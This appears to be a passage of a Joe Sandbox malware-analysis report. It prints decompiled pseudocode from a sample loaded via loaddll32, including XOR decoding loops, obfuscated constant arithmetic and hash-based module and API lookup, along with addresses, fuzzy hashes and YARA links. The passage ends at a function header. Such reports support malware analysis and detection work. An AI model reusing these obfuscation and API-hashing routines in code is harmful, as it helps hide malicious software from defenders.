                                                                                                          0x02ae1db5
                                                                                                          0x02ae1dbd
                                                                                                          0x02ae1dc5
                                                                                                          0x02ae1dcd
                                                                                                          0x02ae1dd2
                                                                                                          0x02ae1dda
                                                                                                          0x02ae1de2
                                                                                                          0x02ae1dea
                                                                                                          0x02ae1def
                                                                                                          0x02ae1df7
                                                                                                          0x02ae1dff
                                                                                                          0x02ae1e07
                                                                                                          0x02ae1e0f
                                                                                                          0x02ae1e14
                                                                                                          0x02ae1e1c
                                                                                                          0x02ae1e1c
                                                                                                          0x02ae1e22
                                                                                                          0x02ae1e55
                                                                                                          0x02ae1e5c
                                                                                                          0x00000000
                                                                                                          0x02ae1e24
                                                                                                          0x02ae1e26
                                                                                                          0x02ae1e38
                                                                                                          0x02ae1e3d
                                                                                                          0x02ae1e40
                                                                                                          0x00000000
                                                                                                          0x02ae1e40
                                                                                                          0x02ae1e26
                                                                                                          0x00000000
                                                                                                          0x02ae1e22
                                                                                                          0x02ae1e82
                                                                                                          0x02ae1e87
                                                                                                          0x02ae1e8a
                                                                                                          0x02ae1e8c
                                                                                                          0x02ae1e8c
                                                                                                          0x02ae1e9a

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
                                                                                                          • Instruction ID: 20f6993a97057fa77e431aad5148d7966dfd4f2a2a2972513b21314408f267c4
                                                                                                          • Opcode Fuzzy Hash: 093d82f95d62312768d893bf8c84c3e2e2046d03e20daec24e1e81ca69d6cf6d
                                                                                                          • Instruction Fuzzy Hash: 185153722093029FCB54DF21D98952FBBE1FBD4758F404A1CF19A96221D7B58A0ACF87
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFFF58, Relevance: .1, Instructions: 97COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 93%
                                                                                                          			E02AFFF58(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _t121;
				signed int* _t123;
				intOrPtr _t125;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;

				_v24 = 0xfb956e;
				_v24 = _v24 ^ 0xccd4b1e5;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x30bd930f;
				_v44 = 0xac147c;
				_t137 = __edx;
				_v44 = _v44 * 0x49;
				_v44 = _v44 ^ 0x31196cd2;
				_v8 = 0x40a8d3;
				_v8 = _v8 | 0x3acc4d3b;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x3596af33;
				_v40 = 0x7a1af9;
				_v40 = _v40 | 0x9e6699ed;
				_v40 = _v40 ^ 0x9e79921f;
				_v28 = 0x2e80d;
				_v28 = _v28 | 0x96bed856;
				_v28 = _v28 + 0x6398;
				_v28 = _v28 ^ 0x96be47ad;
				_v16 = 0x1a939;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 + 0xffff851f;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x0002802d;
				_v12 = 0x8a82de;
				_v12 = _v12 + 0xffff96d2;
				_v12 = _v12 << 0xd;
				_t138 = 0x7d;
				_v12 = _v12 / _t138;
				_v12 = _v12 ^ 0x00892f26;
				_v48 = 0xf49a5c;
				_v48 = _v48 + 0x7176;
				_v48 = _v48 ^ 0x00fa98c0;
				_v52 = 0x2df28f;
				_t139 = 0x75;
				_v52 = _v52 / _t139;
				_v52 = _v52 ^ 0x0004ae50;
				_v36 = 0xfa4daf;
				_v36 = _v36 << 0xc;
				_t140 = 0x6f;
				_v36 = _v36 * 0x11;
				_v36 = _v36 ^ 0xf2876c8f;
				_v32 = 0x3a5591;
				_v32 = _v32 >> 4;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00085aff;
				_v20 = 0x5fc7f5;
				_v20 = _v20 / _t140;
				_v20 = _v20 << 0xc;
				_v20 = _v20 >> 9;
				_v20 = _v20 ^ 0x000581a9;
				_push(_v40);
				_push(_v8);
				_push(_v44);
				_t121 = E02AE52B9(E02AFE1F8(_t123, _v24, _v20), _v28, _v16, _v12, _v48);
				_t125 =  *0x2b0620c; // 0x0
				 *((intOrPtr*)(_t125 + 0x14 + _t137 * 4)) = _t121;
				return E02AFFECB(_t120, _v52, _v36, _v32, _v20);
			}






















                                                                                                          0x02afff5e
                                                                                                          0x02afff65
                                                                                                          0x02afff6c
                                                                                                          0x02afff70
                                                                                                          0x02afff77
                                                                                                          0x02afff86
                                                                                                          0x02afff8a
                                                                                                          0x02afff8d
                                                                                                          0x02afff94
                                                                                                          0x02afff9b
                                                                                                          0x02afffa2
                                                                                                          0x02afffa6
                                                                                                          0x02afffaa
                                                                                                          0x02afffb1
                                                                                                          0x02afffb8
                                                                                                          0x02afffbf
                                                                                                          0x02afffc6
                                                                                                          0x02afffcd
                                                                                                          0x02afffd4
                                                                                                          0x02afffdb
                                                                                                          0x02afffe2
                                                                                                          0x02afffe9
                                                                                                          0x02afffed
                                                                                                          0x02affff4
                                                                                                          0x02affff8
                                                                                                          0x02afffff
                                                                                                          0x02b00006
                                                                                                          0x02b0000d
                                                                                                          0x02b00014
                                                                                                          0x02b00019
                                                                                                          0x02b0001e
                                                                                                          0x02b00025
                                                                                                          0x02b0002c
                                                                                                          0x02b00033
                                                                                                          0x02b0003a
                                                                                                          0x02b00044
                                                                                                          0x02b00049
                                                                                                          0x02b0004e
                                                                                                          0x02b00055
                                                                                                          0x02b0005c
                                                                                                          0x02b00064
                                                                                                          0x02b00065
                                                                                                          0x02b00068
                                                                                                          0x02b0006f
                                                                                                          0x02b00076
                                                                                                          0x02b0007a
                                                                                                          0x02b0007e
                                                                                                          0x02b00085
                                                                                                          0x02b00091
                                                                                                          0x02b00094
                                                                                                          0x02b00098
                                                                                                          0x02b0009c
                                                                                                          0x02b000a3
                                                                                                          0x02b000a6
                                                                                                          0x02b000a9
                                                                                                          0x02b000c4
                                                                                                          0x02b000c9
                                                                                                          0x02b000d2
                                                                                                          0x02b000ee

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: abef1dd8a2fedce7aa7e3c0cd657c6acbada2293adedc280b2aa2ccf273b699b
                                                                                                          • Instruction ID: 5c7c8a61ef831c77172f2d1721093d2fe34a5204e6428d0cd70f1969f18601f5
                                                                                                          • Opcode Fuzzy Hash: abef1dd8a2fedce7aa7e3c0cd657c6acbada2293adedc280b2aa2ccf273b699b
                                                                                                          • Instruction Fuzzy Hash: 2B41EC72D01229EBCF09DFA5D94A4DEBFB2FB48314F108199D522B6220D3B90A59DF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF4244, Relevance: .1, Instructions: 91COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 92%
                                                                                                          			E02AF4244(void* __ecx, void* __edx, void* __eflags) {
				signed int* _t49;
				signed int _t51;
				unsigned int* _t65;
				signed int _t66;
				signed int _t68;
				signed int _t72;
				unsigned int _t73;
				unsigned int _t74;
				unsigned int* _t77;
				signed int* _t78;
				signed int* _t79;
				unsigned int _t81;
				void* _t87;
				void* _t89;
				void* _t91;
				void* _t93;

				_push( *(_t91 + 0x2c));
				_push( *(_t91 + 0x2c));
				_push( *((intOrPtr*)(_t91 + 0x18)));
				_t49 = E02AFFE29( *((intOrPtr*)(_t91 + 0x18)));
				 *(_t91 + 0x28) = 0x3d5cbc;
				_t5 =  &(_t49[1]); // 0x4
				_t78 = _t5;
				 *(_t91 + 0x28) =  *(_t91 + 0x28) | 0x6bd7da0a;
				 *(_t91 + 0x28) =  *(_t91 + 0x28) ^ 0x6bf86309;
				 *(_t91 + 0x38) = 0xea1d3d;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) | 0x10653bc0;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) ^ 0x4ee4a363;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) | 0xb4800a62;
				 *(_t91 + 0x38) =  *(_t91 + 0x38) ^ 0xfe847125;
				 *(_t91 + 0x24) = 0x45f786;
				 *(_t91 + 0x24) =  *(_t91 + 0x24) | 0x34f761f8;
				 *(_t91 + 0x24) =  *(_t91 + 0x24) ^ 0x34f5c6b3;
				 *(_t91 + 0x20) = 0xc15f52;
				 *(_t91 + 0x20) =  *(_t91 + 0x20) ^ 0x92036f91;
				 *(_t91 + 0x20) =  *(_t91 + 0x20) ^ 0x92c36404;
				_t68 =  *_t49;
				_t79 =  &(_t78[1]);
				_t51 =  *_t78 ^ _t68;
				 *(_t91 + 0x2c) = _t68;
				 *(_t91 + 0x30) = _t51;
				_t31 = _t51 + 1; // 0x1
				_t81 =  !=  ? (_t31 & 0xfffffffc) + 4 : _t31;
				_t65 = E02AEC5D8(_t81);
				_t93 = _t91 + 0x18;
				 *(_t93 + 0x24) = _t65;
				if(_t65 != 0) {
					_t89 = 0;
					_t77 = _t65;
					_t87 =  >  ? 0 :  &(_t79[_t81 >> 2]) - _t79 + 3 >> 2;
					if(_t87 != 0) {
						_t66 =  *(_t93 + 0x1c);
						do {
							_t72 =  *_t79;
							_t79 =  &(_t79[1]);
							_t73 = _t72 ^ _t66;
							 *_t77 = _t73;
							_t77 =  &(_t77[1]);
							_t74 = _t73 >> 0x10;
							 *((char*)(_t77 - 3)) = _t73 >> 8;
							 *(_t77 - 2) = _t74;
							_t89 = _t89 + 1;
							 *((char*)(_t77 - 1)) = _t74 >> 8;
						} while (_t89 < _t87);
						_t65 =  *(_t93 + 0x28);
					}
					 *((char*)(_t65 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
				}
				return _t65;
			}



















                                                                                                          0x02af424e
                                                                                                          0x02af4252
                                                                                                          0x02af4256
                                                                                                          0x02af4259
                                                                                                          0x02af425e
                                                                                                          0x02af4266
                                                                                                          0x02af4266
                                                                                                          0x02af4269
                                                                                                          0x02af4271
                                                                                                          0x02af4279
                                                                                                          0x02af4281
                                                                                                          0x02af4289
                                                                                                          0x02af4291
                                                                                                          0x02af4299
                                                                                                          0x02af42a1
                                                                                                          0x02af42a9
                                                                                                          0x02af42b1
                                                                                                          0x02af42b9
                                                                                                          0x02af42c1
                                                                                                          0x02af42c9
                                                                                                          0x02af42d1
                                                                                                          0x02af42d5
                                                                                                          0x02af42d8
                                                                                                          0x02af42da
                                                                                                          0x02af42de
                                                                                                          0x02af42e2
                                                                                                          0x02af42f2
                                                                                                          0x02af430e
                                                                                                          0x02af4310
                                                                                                          0x02af4313
                                                                                                          0x02af4319
                                                                                                          0x02af4321
                                                                                                          0x02af4323
                                                                                                          0x02af4334
                                                                                                          0x02af4339
                                                                                                          0x02af433b
                                                                                                          0x02af433f
                                                                                                          0x02af433f
                                                                                                          0x02af4341
                                                                                                          0x02af4344
                                                                                                          0x02af4346
                                                                                                          0x02af434d
                                                                                                          0x02af4350
                                                                                                          0x02af4353
                                                                                                          0x02af4356
                                                                                                          0x02af435c
                                                                                                          0x02af435d
                                                                                                          0x02af4360
                                                                                                          0x02af4364
                                                                                                          0x02af4364
                                                                                                          0x02af436d
                                                                                                          0x02af436d
                                                                                                          0x02af4379

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
                                                                                                          • Instruction ID: d0e933ff7c214c85e5bd1aca5d1ba614b984931206e547c9f2366118a078b9b0
                                                                                                          • Opcode Fuzzy Hash: 37e89cb84dd8fa63864b63d4cf921de512c7c968c9f482bdb6f048739d92c7a5
                                                                                                          • Instruction Fuzzy Hash: AB3189726083408FC305CF68D48195BFBE0FB88758F454B6DF98AA7221D774DA09CB96
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF3D85, Relevance: .1, Instructions: 86COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 91%
                                                                                                          			E02AF3D85(void* __ecx, signed int* __edx, void* __eflags, signed int* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				void* _t46;
				signed int _t49;
				signed int* _t63;
				void* _t69;
				signed int _t72;
				void* _t77;
				unsigned int _t79;
				void* _t81;
				signed int* _t82;
				signed int* _t83;
				void* _t84;

				_t63 = _a4;
				_push(_a8);
				_push(_t63);
				_push(__edx);
				E02AFFE29(_t46);
				_v12 = 0xc30617;
				_t82 =  &(__edx[1]);
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x0000aeb3;
				_v20 = 0xf93b19;
				_v20 = _v20 * 0x55;
				_v20 = _v20 ^ 0x85e9037f;
				_v20 = _v20 + 0xffff2dcc;
				_v20 = _v20 ^ 0xd720e096;
				_v16 = 0x37fa8e;
				_v16 = _v16 ^ 0xc309fd15;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x018ad68f;
				_v24 = 0x2aa640;
				_v24 = _v24 | 0xaf302e4c;
				_v24 = _v24 << 2;
				_v24 = _v24 | 0xa0025b53;
				_v24 = _v24 ^ 0xbce807cd;
				_t49 =  *__edx;
				_t83 =  &(_t82[1]);
				_t72 =  *_t82 ^ _t49;
				_v8 = _t49;
				_v4 = _t72;
				_t79 =  !=  ? (_t72 & 0xfffffffc) + 4 : _t72;
				_t84 = E02AEC5D8(_t79);
				if(_t84 == 0) {
					L6:
					return _t84;
				}
				_t81 = 0;
				_t77 =  >  ? 0 :  &(_t83[_t79 >> 2]) - _t83 + 3 >> 2;
				if(_t77 == 0) {
					L4:
					if(_t63 != 0) {
						 *_t63 = _v4;
					}
					goto L6;
				}
				_t69 = _t84 - _t83;
				do {
					_t81 = _t81 + 1;
					 *(_t69 + _t83) =  *_t83 ^ _v8;
					_t83 =  &(_t83[1]);
				} while (_t81 < _t77);
				goto L4;
			}




















                                                                                                          0x02af3d89
                                                                                                          0x02af3d90
                                                                                                          0x02af3d94
                                                                                                          0x02af3d95
                                                                                                          0x02af3d97
                                                                                                          0x02af3d9c
                                                                                                          0x02af3da4
                                                                                                          0x02af3da7
                                                                                                          0x02af3dac
                                                                                                          0x02af3db4
                                                                                                          0x02af3dc1
                                                                                                          0x02af3dc5
                                                                                                          0x02af3dcd
                                                                                                          0x02af3dd5
                                                                                                          0x02af3ddd
                                                                                                          0x02af3de5
                                                                                                          0x02af3ded
                                                                                                          0x02af3df2
                                                                                                          0x02af3dfa
                                                                                                          0x02af3e02
                                                                                                          0x02af3e0a
                                                                                                          0x02af3e0f
                                                                                                          0x02af3e17
                                                                                                          0x02af3e1f
                                                                                                          0x02af3e23
                                                                                                          0x02af3e26
                                                                                                          0x02af3e28
                                                                                                          0x02af3e2e
                                                                                                          0x02af3e3f
                                                                                                          0x02af3e5b
                                                                                                          0x02af3e62
                                                                                                          0x02af3ea2
                                                                                                          0x02af3ea9
                                                                                                          0x02af3ea9
                                                                                                          0x02af3e6c
                                                                                                          0x02af3e7a
                                                                                                          0x02af3e7f
                                                                                                          0x02af3e96
                                                                                                          0x02af3e98
                                                                                                          0x02af3e9e
                                                                                                          0x02af3e9e
                                                                                                          0x00000000
                                                                                                          0x02af3e98
                                                                                                          0x02af3e83
                                                                                                          0x02af3e85
                                                                                                          0x02af3e8b
                                                                                                          0x02af3e8c
                                                                                                          0x02af3e8f
                                                                                                          0x02af3e92
                                                                                                          0x00000000

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
                                                                                                          • Instruction ID: 2663c253256a8ddff90d53f6c1cc46487c5ee0239ad375da7a25fcd908c1593d
                                                                                                          • Opcode Fuzzy Hash: 69d5b5b74808eb49daa8270ee7dfe51a587ad052fe83dd9d48b36d2eab0a3116
                                                                                                          • Instruction Fuzzy Hash: 6B3166726083408FC758DF69C98550BBBE2FBC8618F044B6DF589A3214EB78DA058F56
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AEF0E9, Relevance: .1, Instructions: 70COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 85%
                                                                                                          			E02AEF0E9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t69;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t87;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t69);
				_v8 = 0x819b57;
				_v8 = _v8 >> 0x10;
				_t83 = 0x17;
				_v8 = _v8 / _t83;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x00008000;
				_v24 = 0x7d8883;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 + 0xffff5cfc;
				_v24 = _v24 ^ 0xfff105d0;
				_v16 = 0x4e701e;
				_v16 = _v16 ^ 0xb2bd4297;
				_t84 = 0x5b;
				_v16 = _v16 / _t84;
				_t85 = 0x7f;
				_v16 = _v16 / _t85;
				_v16 = _v16 ^ 0x000cfa43;
				_v12 = 0xc80371;
				_t86 = 0x37;
				_v12 = _v12 / _t86;
				_v12 = _v12 >> 1;
				_t87 = 0x79;
				_v12 = _v12 / _t87;
				_v12 = _v12 ^ 0x0004b486;
				_v20 = 0xa43314;
				_v20 = _v20 << 3;
				_v20 = _v20 + 0xa205;
				_v20 = _v20 ^ 0x052abea0;
				return E02AEF8A9(_v24, _v16, __edx, _v12, _v8, _v20);
			}














                                                                                                          0x02aef0f0
                                                                                                          0x02aef0f5
                                                                                                          0x02aef0f8
                                                                                                          0x02aef0f9
                                                                                                          0x02aef0fa
                                                                                                          0x02aef0ff
                                                                                                          0x02aef108
                                                                                                          0x02aef111
                                                                                                          0x02aef116
                                                                                                          0x02aef11b
                                                                                                          0x02aef11f
                                                                                                          0x02aef126
                                                                                                          0x02aef12d
                                                                                                          0x02aef131
                                                                                                          0x02aef138
                                                                                                          0x02aef13f
                                                                                                          0x02aef146
                                                                                                          0x02aef150
                                                                                                          0x02aef155
                                                                                                          0x02aef15d
                                                                                                          0x02aef162
                                                                                                          0x02aef167
                                                                                                          0x02aef16e
                                                                                                          0x02aef178
                                                                                                          0x02aef17d
                                                                                                          0x02aef182
                                                                                                          0x02aef188
                                                                                                          0x02aef18b
                                                                                                          0x02aef18e
                                                                                                          0x02aef195
                                                                                                          0x02aef19c
                                                                                                          0x02aef1a0
                                                                                                          0x02aef1a7
                                                                                                          0x02aef1ca

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
                                                                                                          • Instruction ID: cf54166982a4093fd06164d1de30836e51d944f75ef5f990c7d92c446a3af685
                                                                                                          • Opcode Fuzzy Hash: f7bc40e7220c11a054e5cb1e3d04733d7eea9a3290a44af2851a921ba079d4ed
                                                                                                          • Instruction Fuzzy Hash: FC21F376E00209EBDF08CFE5C9099DEBBB2EB54314F20809AE519AA290D7B55B54DF80
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF567B, Relevance: .1, Instructions: 70COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E02AF567B(void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t66;
				void* _t70;
				signed int _t71;
				signed int _t72;
				intOrPtr* _t81;
				intOrPtr* _t82;
				void* _t83;

				_v16 = 0x3cd044;
				_v16 = _v16 + 0x8a1e;
				_t70 = __edx;
				_t71 = 0x23;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000ceb59;
				_v20 = 0x98fec3;
				_v20 = _v20 + 0x117b;
				_v20 = _v20 ^ 0x00928bce;
				_v12 = 0xc66557;
				_v12 = _v12 | 0xbd5cb058;
				_t72 = 0x6a;
				_v12 = _v12 / _t72;
				_v12 = _v12 * 0x5e;
				_v12 = _v12 ^ 0xa86b283b;
				_v8 = 0xf205aa;
				_v8 = _v8 ^ 0x840ccd49;
				_v8 = _v8 + 0x2990;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0003f43b;
				_v28 = 0xeebda;
				_v28 = _v28 + 0xdccc;
				_v28 = _v28 ^ 0x00000347;
				_v24 = 0xa36d5e;
				_v24 = _v24 | 0xd0b00948;
				_v24 = _v24 ^ 0xd0bd6ebb;
				_t81 =  *((intOrPtr*)(E02AEF7F7() + 0xc)) + 0xc;
				_t82 =  *_t81;
				while(_t82 != _t81) {
					_t66 = E02AEEFE1(_v8, _v28, _v24,  *((intOrPtr*)(_t82 + 0x30)));
					_t83 = _t83 + 0xc;
					if((_t66 ^ 0x2d567c83) == _t70) {
						return  *((intOrPtr*)(_t82 + 0x18));
					}
					_t82 =  *_t82;
				}
				return 0;
			}
















                                                                                                          0x02af5681
                                                                                                          0x02af5688
                                                                                                          0x02af5695
                                                                                                          0x02af569b
                                                                                                          0x02af56a0
                                                                                                          0x02af56a5
                                                                                                          0x02af56ac
                                                                                                          0x02af56b3
                                                                                                          0x02af56ba
                                                                                                          0x02af56c1
                                                                                                          0x02af56c8
                                                                                                          0x02af56d2
                                                                                                          0x02af56d5
                                                                                                          0x02af56dc
                                                                                                          0x02af56df
                                                                                                          0x02af56e6
                                                                                                          0x02af56ed
                                                                                                          0x02af56f4
                                                                                                          0x02af56fb
                                                                                                          0x02af56ff
                                                                                                          0x02af5706
                                                                                                          0x02af570d
                                                                                                          0x02af5714
                                                                                                          0x02af571b
                                                                                                          0x02af5722
                                                                                                          0x02af5729
                                                                                                          0x02af573e
                                                                                                          0x02af5741
                                                                                                          0x02af5767
                                                                                                          0x02af5754
                                                                                                          0x02af575e
                                                                                                          0x02af5763
                                                                                                          0x00000000
                                                                                                          0x02af5774
                                                                                                          0x02af5765
                                                                                                          0x02af5765
                                                                                                          0x00000000

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
                                                                                                          • Instruction ID: 507db355a3a9c25a2e1102d34e1e6697de8f7c1530117fb7c100bdc855747fcf
                                                                                                          • Opcode Fuzzy Hash: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
                                                                                                          • Instruction Fuzzy Hash: E3312772E00209EFDB58DFE5C98A8AEFBB1FB40314F248499E515B7210D7B45B558F81
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF0EBC, Relevance: .1, Instructions: 58COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 58%
                                                                                                          			E02AF0EBC(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a28, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t44;
				intOrPtr* _t51;

				E02AFFE29(_t44);
				_v20 = 0x5f9276;
				_v20 = _v20 >> 6;
				_v20 = _v20 >> 0xa;
				_v20 = _v20 ^ 0x0000ae6f;
				_v16 = 0x7df0fb;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x9952d77b;
				_v16 = _v16 ^ 0x9951c792;
				_v12 = 0xf93209;
				_v12 = _v12 | 0xf37a8f1a;
				_v12 = _v12 + 0xffff09ac;
				_v12 = _v12 + 0xa761;
				_v12 = _v12 ^ 0xf3f42664;
				_v8 = 0x4c6886;
				_v8 = _v8 ^ 0x2aaf40fd;
				_v8 = _v8 * 0x7c;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x0632021c;
				_t51 = E02AEEB52(__ecx, __ecx, 0xc0c22a7, 0x4d, 0xa2289af1);
				return  *_t51(0, 0, _a32, _a28, 0, 0, __ecx, 0, _a4, 0, _a12, _a16, 0, 0, _a28, _a32);
			}









                                                                                                          0x02af0ed9
                                                                                                          0x02af0ede
                                                                                                          0x02af0ee8
                                                                                                          0x02af0eec
                                                                                                          0x02af0ef0
                                                                                                          0x02af0ef7
                                                                                                          0x02af0efe
                                                                                                          0x02af0f02
                                                                                                          0x02af0f09
                                                                                                          0x02af0f10
                                                                                                          0x02af0f17
                                                                                                          0x02af0f1e
                                                                                                          0x02af0f25
                                                                                                          0x02af0f2c
                                                                                                          0x02af0f33
                                                                                                          0x02af0f3a
                                                                                                          0x02af0f52
                                                                                                          0x02af0f55
                                                                                                          0x02af0f59
                                                                                                          0x02af0f6d
                                                                                                          0x02af0f85

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
                                                                                                          • Instruction ID: 8eb32679c934046dc4f786e6adf8f631ad9854a557371867bf16291b2efea015
                                                                                                          • Opcode Fuzzy Hash: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
                                                                                                          • Instruction Fuzzy Hash: 29210E71801219FBCF58DFA1CD4A8CEBFB4FF08354F108688A958A2220D3798A14DF91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AEEF0C, Relevance: .1, Instructions: 56COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 95%
